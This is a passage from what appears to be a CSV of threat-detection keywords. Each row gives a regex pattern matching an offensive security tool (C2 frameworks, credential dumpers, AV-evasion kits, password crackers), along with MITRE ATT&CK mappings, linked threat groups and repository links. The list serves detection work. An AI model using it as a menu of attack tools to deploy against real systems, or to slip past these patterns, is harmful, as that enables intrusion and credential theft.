T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rvrsh3ll/BOF_Collection","1","0","N/A","10","10","517","52","2022-10-16T13:57:18Z","2020-07-16T18:24:55Z" "*inline-execute *.o*",".{0,1000}inline\-execute\s.{0,1000}\.o.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "*inline-execute *tokenprivileges.o*",".{0,1000}inline\-execute\s.{0,1000}tokenprivileges\.o.{0,1000}","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","0","N/A","9","4","330","38","2023-03-23T09:50:09Z","2023-03-20T04:19:40Z" "*inline-execute StartWebClientSvc.x64.o*",".{0,1000}inline\-execute\sStartWebClientSvc\.x64\.o.{0,1000}","offensive_tool_keyword","NTLMRelay2Self","An other No-Fix LPE - NTLMRelay2Self over HTTP (Webdav).","T1078 - T1078.004 - T1557 - T1557.001 - T1068","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/med0x2e/NTLMRelay2Self","1","0","N/A","10","4","377","44","2024-01-27T08:52:03Z","2022-04-30T10:05:02Z" "*inline-execute*whereami.x64*",".{0,1000}inline\-execute.{0,1000}whereami\.x64.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) that uses handwritten shellcode to return the process Environment strings without touching any DLL's.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/whereami","1","1","N/A","10","10","157","28","2023-03-13T15:56:38Z","2021-08-19T22:32:34Z" "*inlineExecute.nim*",".{0,1000}inlineExecute\.nim.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "*InlineExecute-Assembly*",".{0,1000}InlineExecute\-Assembly.{0,1000}","offensive_tool_keyword","cobaltstrike","InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/InlineExecute-Assembly","1","1","N/A","10","10","547","113","2023-07-22T23:25:15Z","2021-07-08T17:40:07Z" "*InlineShellcode*",".{0,1000}InlineShellcode.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","907","125","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z" "*InlineWhispers.py*",".{0,1000}InlineWhispers\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/InlineWhispers","1","1","N/A","10","10","295","41","2021-11-09T15:39:27Z","2020-12-25T16:52:50Z" "*InlineWhispers2*",".{0,1000}InlineWhispers2.{0,1000}","offensive_tool_keyword","cobaltstrike","Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF) via Syswhispers2","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Sh0ckFR/InlineWhispers2","1","1","N/A","10","10","172","30","2022-07-21T08:40:05Z","2021-11-16T12:47:35Z" "*Input Merlin message base:*",".{0,1000}Input\sMerlin\smessage\sbase\:.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*input/shellcode_enc_raw.txt*",".{0,1000}input\/shellcode_enc_raw\.txt.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*input/shellcode_raw.txt*",".{0,1000}input\/shellcode_raw\.txt.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*ins1gn1a/Frampton*",".{0,1000}ins1gn1a\/Frampton.{0,1000}","offensive_tool_keyword","frampton","PE Binary Shellcode Injector - Automated code cave discovery. shellcode injection - ASLR bypass - x86/x64 compatible","T1055 - T1548.002 - T1129 - T1001","TA0002 - TA0003- TA0004 -TA0011","N/A","N/A","POST Exploitation tools","https://github.com/ins1gn1a/Frampton","1","1","N/A","N/A","1","75","18","2019-11-24T22:34:48Z","2019-10-29T00:22:14Z" "*InsecurePowerShell*",".{0,1000}InsecurePowerShell.{0,1000}","offensive_tool_keyword","InsecurePowerShell","powershell without securities features","T1059 - T1086 - T1117","TA0002 - TA0003 - TA0040","N/A","N/A","Defense Evasion","https://github.com/cobbr/InsecurePowerShell","1","0","N/A","N/A","2","100","18","2017-12-19T03:40:33Z","2017-12-17T02:16:21Z" "*insecurityofthings*jackit*",".{0,1000}insecurityofthings.{0,1000}jackit.{0,1000}","offensive_tool_keyword","jackit","This is a partial implementation of Bastilles MouseJack exploit. See mousejack.com for more details. Full credit goes to Bastilles team for discovering this issue and writing the libraries to work with the CrazyRadio PA dongle. Also. thanks to Samy Kamkar for KeySweeper. to Thorsten Schroeder and Max Moser for their work on KeyKeriki and to Travis Goodspeed. We stand on the shoulders of giants.","T1210 - T1212 - T1560 - T1562","TA0002 - TA0009","N/A","N/A","Exploitation tools","https://github.com/insecurityofthings/jackit","1","0","N/A","N/A","8","786","142","2020-10-01T04:37:00Z","2016-07-01T23:21:56Z" "*INSERT INTO LDAPHUNTERFINDINGS *",".{0,1000}INSERT\sINTO\sLDAPHUNTERFINDINGS\s.{0,1000}","offensive_tool_keyword","LDAP-Password-Hunter","LDAP Password Hunter is a tool which wraps features of getTGT.py (Impacket) and ldapsearch in order to look up for password stored in LDAP database","T1558.003 - T1003.003 - T1078.003 - T1212","TA0006 - TA0007 - TA0003","N/A","N/A","Credential Access","https://github.com/oldboy21/LDAP-Password-Hunter","1","0","N/A","10","2","191","27","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z" "*insert_top_100_passwords_1_G*",".{0,1000}insert_top_100_passwords_1_G.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*InsidePro-PasswordsPro.rule*",".{0,1000}InsidePro\-PasswordsPro\.rule.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*InspectAssembly.csproj*",".{0,1000}InspectAssembly\.csproj.{0,1000}","offensive_tool_keyword","InspectAssembly","Inspect's a target .NET assembly's CIL for calls to deserializers and .NET remoting usage to aid in triaging potential privilege escalations.","T1055.012 - T1027 - T1112","TA0005 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/matterpreter/OffensiveCSharp/tree/master/InspectAssembly","1","1","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*InspectAssembly.exe*",".{0,1000}InspectAssembly\.exe.{0,1000}","offensive_tool_keyword","InspectAssembly","Inspect's a target .NET assembly's CIL for calls to deserializers and .NET remoting usage to aid in triaging potential privilege escalations.","T1055.012 - T1027 - T1112","TA0005 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/matterpreter/OffensiveCSharp/tree/master/InspectAssembly","1","1","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*install powershell-empire*",".{0,1000}install\s\spowershell\-empire.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*install * roadrecon*",".{0,1000}install\s.{0,1000}\sroadrecon.{0,1000}","offensive_tool_keyword","ROADtools","A collection of Azure AD tools for offensive and defensive security purposes","T1136.003 - T1078.004 - T1021.006 - T1003.003","TA0002 - TA0004 - TA0005 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/dirkjanm/ROADtools","1","1","N/A","N/A","10","1667","237","2024-05-01T14:35:20Z","2020-03-28T09:56:08Z" "*install amass",".{0,1000}install\samass","offensive_tool_keyword","Amass","In-depth subdomain enumeration tool that performs scraping. recursive brute forcing06/01/2021 crawling of web archives06/01/2021 name altering and reverse DNS sweeping","T1593 - T1594 - T1595 - T1567 - T1569","TA0007 - TA0009 - TA0004 - TA0005 - TA0011","N/A","N/A","Information Gathering","https://github.com/OWASP/Amass","1","0","N/A","N/A","10","11204","1816","2024-04-13T11:51:46Z","2018-07-10T16:05:08Z" "*install bloodhound*",".{0,1000}install\sbloodhound.{0,1000}","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","0","N/A","10","10","1764","297","2024-05-01T14:33:58Z","2018-02-26T14:44:20Z" "*install c2tc-domaininfo*",".{0,1000}install\sc2tc\-domaininfo.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*install cdn-proxy*",".{0,1000}install\scdn\-proxy.{0,1000}","offensive_tool_keyword","cdn-proxy","cdn-proxy is a set of tools for bypassing IP allow listing intended to restrict origin access to requests originating from shared CDNs.","T1100 - T1090 - T1105 - T1133 - T1190","TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/RyanJarv/cdn-proxy","1","0","N/A","N/A","3","225","26","2022-08-25T00:40:25Z","2022-03-07T21:11:07Z" "*install certsync*",".{0,1000}install\scertsync.{0,1000}","offensive_tool_keyword","certsync","Dump NTDS with golden certificates and UnPAC the hash","T1553.002 - T1003.001 - T1145","TA0002 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/zblurx/certsync","1","0","N/A","N/A","7","602","68","2024-03-20T10:58:15Z","2023-01-31T15:37:12Z" "*install coercer*",".{0,1000}install\scoercer.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","0","N/A","10","10","1564","175","2024-04-17T07:30:29Z","2022-06-30T16:52:33Z" "*--install -d kali-linux*",".{0,1000}\-\-install\s\-d\skali\-linux.{0,1000}","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*install dploot*",".{0,1000}install\sdploot.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","0","N/A","10","4","362","49","2024-04-03T13:35:18Z","2022-05-24T11:05:21Z" "*install gobuster*",".{0,1000}install\sgobuster.{0,1000}","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","0","N/A","N/A","10","9022","1144","2024-04-29T21:27:59Z","2014-11-14T13:18:35Z" "*install h8mail*",".{0,1000}install\sh8mail.{0,1000}","offensive_tool_keyword","h8mail","Powerful and user-friendly password hunting tool.","T1581.002 - T1591 - T1590 - T1596 - T1592 - T1217.001","TA0010","N/A","N/A","Information Gathering","https://github.com/opencubicles/h8mail","1","0","N/A","N/A","1","8","5","2019-08-19T09:46:33Z","2019-08-19T09:45:32Z" "*install hakrawler*",".{0,1000}install\shakrawler.{0,1000}","offensive_tool_keyword","hakrawler","Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application","T1190 - T1212 - T1087.001","TA0007 - TA0003 - TA0009","N/A","N/A","Web Attacks","https://github.com/hakluke/hakrawler","1","0","N/A","6","10","4236","474","2024-01-23T10:58:14Z","2019-12-15T13:54:43Z" "*install hping3*",".{0,1000}install\shping3.{0,1000}","offensive_tool_keyword","hping","hping3 is a network tool able to send custom TCP/IP","T1046 - T1190 - T1200","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/antirez/hping","1","0","N/A","N/A","10","1375","327","2024-04-02T03:16:21Z","2012-06-13T17:41:54Z" "*install hydra-gtk*",".{0,1000}install\shydra\-gtk.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","9028","1885","2024-04-01T12:18:49Z","2014-04-24T14:45:37Z" "*install impacket*",".{0,1000}install\simpacket.{0,1000}","offensive_tool_keyword","cobaltstrike","Fileless Lateral Movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","0","N/A","10","10","1331","230","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z" "*install Jira-Lens*",".{0,1000}install\sJira\-Lens.{0,1000}","offensive_tool_keyword","Jira-Lens","Fast and customizable vulnerability scanner For JIRA written in Python","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/MayankPandey01/Jira-Lens","1","0","N/A","N/A","3","269","38","2024-02-05T10:24:00Z","2021-11-14T18:37:47Z" "*install macchanger*",".{0,1000}install\smacchanger.{0,1000}","offensive_tool_keyword","Rudrastra","Make a Fake wireless access point aka Evil Twin","T1491 - T1090.004 - T1557.001","TA0040 - TA0011 - TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/SxNade/Rudrastra","1","0","N/A","8","1","61","20","2023-04-22T15:10:42Z","2020-11-05T09:38:15Z" "*install p0f*",".{0,1000}install\sp0f.{0,1000}","offensive_tool_keyword","p0f","P0f is a tool that utilizes an array of sophisticated purely passive traffic fingerprinting mechanisms to identify the players behind any incidental TCP/IP communications","T1046 - T1040","TA0007 - TA0010","N/A","N/A","Sniffing & Spoofing","https://www.kali.org/tools/p0f/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*install pivotnacci*",".{0,1000}install\spivotnacci.{0,1000}","offensive_tool_keyword","pivotnacci","A tool to make socks connections through HTTP agents","T1090 - T1090.003","TA0003 - TA0011","N/A","N/A","C2 - Persistence","https://github.com/blackarrowsec/pivotnacci","1","0","N/A","9","10","642","111","2021-03-30T14:37:25Z","2020-04-28T11:36:45Z" "*install pivotnacci*",".{0,1000}install\spivotnacci.{0,1000}","offensive_tool_keyword","pivotnacci","A tool to make socks connections through HTTP agents","T1090 - T1090.003","TA0003 - TA0011","N/A","N/A","C2 - Persistence","https://github.com/blackarrowsec/pivotnacci","1","0","N/A","9","10","642","111","2021-03-30T14:37:25Z","2020-04-28T11:36:45Z" "*install proxychains*",".{0,1000}install\sproxychains.{0,1000}","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027","TA0001 - TA0042","N/A","N/A","Exploitation tools","https://github.com/haad/proxychains","1","0","N/A","8","10","6069","591","2024-01-02T11:23:26Z","2011-02-25T12:27:05Z" "*install pypykatz*",".{0,1000}install\spypykatz.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "*install s3scanner*",".{0,1000}install\ss3scanner.{0,1000}","offensive_tool_keyword","S3Scanner","Scan for open S3 buckets and dump the contents","T1583 - T1583.002 - T1114 - T1114.002","TA0010","N/A","N/A","Reconnaissance","https://github.com/sa7mon/S3Scanner","1","0","N/A","8","10","2388","357","2024-04-19T12:43:19Z","2017-06-19T22:14:21Z" "*install samdump2*",".{0,1000}install\ssamdump2.{0,1000}","offensive_tool_keyword","samdump2","Retrieves syskey and extract hashes from Windows 2k/NT/XP/Vista SAM.","T1003.002 - T1564.001","TA0006 - TA0010","N/A","N/A","Credential Access","https://salsa.debian.org/pkg-security-team/samdump2","1","0","N/A","10","6","N/A","N/A","N/A","N/A" "*install smbmap*",".{0,1000}install\ssmbmap.{0,1000}","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/ShawnDEvans/smbmap","1","0","N/A","10","10","1687","337","2024-01-31T23:23:38Z","2015-03-16T13:15:00Z" "*install smbmap*",".{0,1000}install\ssmbmap.{0,1000}","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/ShawnDEvans/smbmap","1","0","N/A","10","10","1687","337","2024-01-31T23:23:38Z","2015-03-16T13:15:00Z" "*install tor deb.torproject.org-keyring*",".{0,1000}install\stor\sdeb\.torproject\.org\-keyring.{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*install udmp_parser*",".{0,1000}install\sudmp_parser.{0,1000}","offensive_tool_keyword","udmp-parser","A Cross-Platform C++ parser library for Windows user minidumps.","T1005 - T1059.003 - T1027.002","TA0009 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/0vercl0k/udmp-parser","1","0","N/A","6","2","172","24","2024-02-25T13:18:10Z","2022-01-30T18:56:21Z" "*install wapiti*",".{0,1000}install\swapiti.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","0","N/A","N/A","10","979","159","2024-05-01T19:11:32Z","2020-06-06T20:17:55Z" "*install_aclpwn*",".{0,1000}install_aclpwn.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_ad_apt_tools*",".{0,1000}install_ad_apt_tools.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_adidnsdump*",".{0,1000}install_adidnsdump.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_amber*",".{0,1000}install_amber.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive 